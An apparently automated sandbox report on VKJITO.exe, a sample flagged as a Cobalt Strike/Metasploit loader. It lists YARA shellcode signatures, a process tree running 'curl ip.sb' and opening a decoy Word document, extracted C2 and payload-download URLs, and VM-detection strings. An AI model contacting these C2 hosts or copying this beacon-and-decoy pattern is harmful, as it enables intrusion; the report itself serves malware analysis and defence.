Windows Analysis Report
VKJITO.exe

Overview

General Information

Sample name: VKJITO.exe
Analysis ID: 1577651
MD5: 34bfa047aaca8fd4dc99759ebf0e1a6a
SHA1: ae43a10d462f09aa7b945b5b37aad9c0d1df4b01
SHA256: 517b6b3e890f7b93e0006cd8486b778075ebcc647565d37f2186500a8ddc1ff7
Tags: exe, user-smica83
Infos:

Detection

CobaltStrike, Metasploit
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • VKJITO.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\VKJITO.exe" MD5: 34BFA047AACA8FD4DC99759EBF0E1A6A)
    • curl.exe (PID: 7396 cmdline: "curl" ip.sb MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7516 cmdline: "cmd" /c start C:\Users\user\Desktop\???????.docx MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WINWORD.EXE (PID: 7656 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • WerFault.exe (PID: 8100 cmdline: C:\Windows\system32\WerFault.exe -u -p 7380 -s 1164 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}
{"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}
Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown | 0x1e24b:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown | 0x1e2b7:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Source | Rule | Description | Author | Strings
00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security |
00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown | 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown | 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |

        System Summary

        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 139.159.139.109, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\VKJITO.exe, Initiated: true, ProcessId: 7380, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49705
        No Suricata rule has matched

        AV Detection

        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}
        Source: VKJITO.exeReversingLabs: Detection: 42%
        Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C2940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF73A5C2940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C9A10 BCryptGenRandom,0_2_00007FF73A5C9A10
        Source: VKJITO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: winword.exeMemory has grown: Private usage: 1MB later: 86MB

        Networking

        Source: Malware configuration extractorURLs: http://39.159.139.109:8080/uz68
        Source: Malware configuration extractorURLs: http://139.159.139.109/uz68
        Source: global trafficTCP traffic: 192.168.2.7:49705 -> 139.159.139.109:8080
        Source: Joe Sandbox ViewIP Address: 104.26.13.31 104.26.13.31
        Source: Joe Sandbox ViewASN Name: HWCSNETHuaweiCloudServicedatacenterCN HWCSNETHuaweiCloudServicedatacenterCN
        Source: global trafficHTTP traffic detected: GET /uz68 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Host: 139.159.139.109:8080Connection: Keep-AliveCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip.sbUser-Agent: curl/7.83.1Accept: */*
        Source: global trafficDNS traffic detected: DNS query: time.windows.com
        Source: global trafficDNS traffic detected: DNS query: ip.sb
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmp, VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68d(
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68dg
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68ig
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68ug
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68x(
        Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
        Source: curl.exe, 00000001.00000002.1364350016.00000138A0739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip.sb/
        Source: curl.exe, 00000001.00000002.1364350016.00000138A0739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip.sb/edNameSpaceh51
        Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net

        System Summary

        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, type: DROPPEDMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, type: DROPPEDMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C0E60 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF73A5C0E60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C0D00 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF73A5C0D00
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A59CEC0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,0_2_00007FF73A59CEC0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF73A592AC0 appears 64 times
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF73A5DC330 appears 47 times
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF73A5AA450 appears 73 times
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7380 -s 1164
        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: classification engineClassification label: mal88.troj.winEXE@12/239@3/3
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C0FB0 memset,GetModuleHandleW,FormatMessageW,GetLastError,0_2_00007FF73A5C0FB0
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
        Source: C:\Users\user\Desktop\VKJITO.exe File created: C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7380
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user~1\AppData\Local\Temp\{688B8AE6-E969-4F29-8173-3E974F88B889} - OProcSessId.dat
        Source: VKJITO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\VKJITO.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\VKJITO.exe "C:\Users\user\Desktop\VKJITO.exe"
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sb
        Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: unknown unknown
        Source: C:\Users\user\Desktop\VKJITO.exe Section loaded: apphelp.dll, vcruntime140.dll, cryptbase.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
        Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll, sspicli.dll, iphlpapi.dll, mswsock.dll, kernel.appcore.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, sspicli.dll, apphelp.dll, vcruntime140_1.dll, vcruntime140.dll, msvcp140.dll, xmllite.dll, mlang.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
        Source: C:\Users\user\Desktop\VKJITO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
        Source: ???????.LNK.7.drLNK file: ..\..\..\..\..\Desktop\.docx
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
        Source: VKJITO.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: VKJITO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: VKJITO.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: VKJITO.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: VKJITO.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: VKJITO.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: VKJITO.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF73A5CBCB0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,ReleaseMutex,0_2_00007FF73A5CBCB0
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00000266E7A40128 push eax; ret 0_2_00000266E7A40364
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00000266E7A402FA push eax; ret 0_2_00000266E7A40364
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF73A5A1880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF73A5A1880
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Source: Amcache.hve.12.dr Binary or memory string: VMware
        Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
        Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
        Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
        Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7A95000.00000004.00000020.00020000.00000000.sdmp, VKJITO.exe, 00000000.00000002.2082182507.00000266E7AD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWiz
        Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
        Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
        Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
        Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
        Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.12.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
        Source: curl.exe, 00000001.00000003.1363378838.00000138A0744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
        Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF73A5DA9C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73A5DA9C0
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF73A5A1850 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF73A5A1850
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF73A5DAB64 SetUnhandledExceptionFilter,0_2_00007FF73A5DAB64
        Source: C:\Users\user\Desktop\VKJITO.exe Memory allocated: page read and write | page guard
        Source: C:\Users\user\Desktop\VKJITO.exe Process created: C:\Windows\System32\curl.exe "curl" ip.sb
        Source: C:\Users\user\Desktop\VKJITO.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF73A5C2940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF73A5C2940
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF73A5DA89C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF73A5DA89C
        Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
        Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
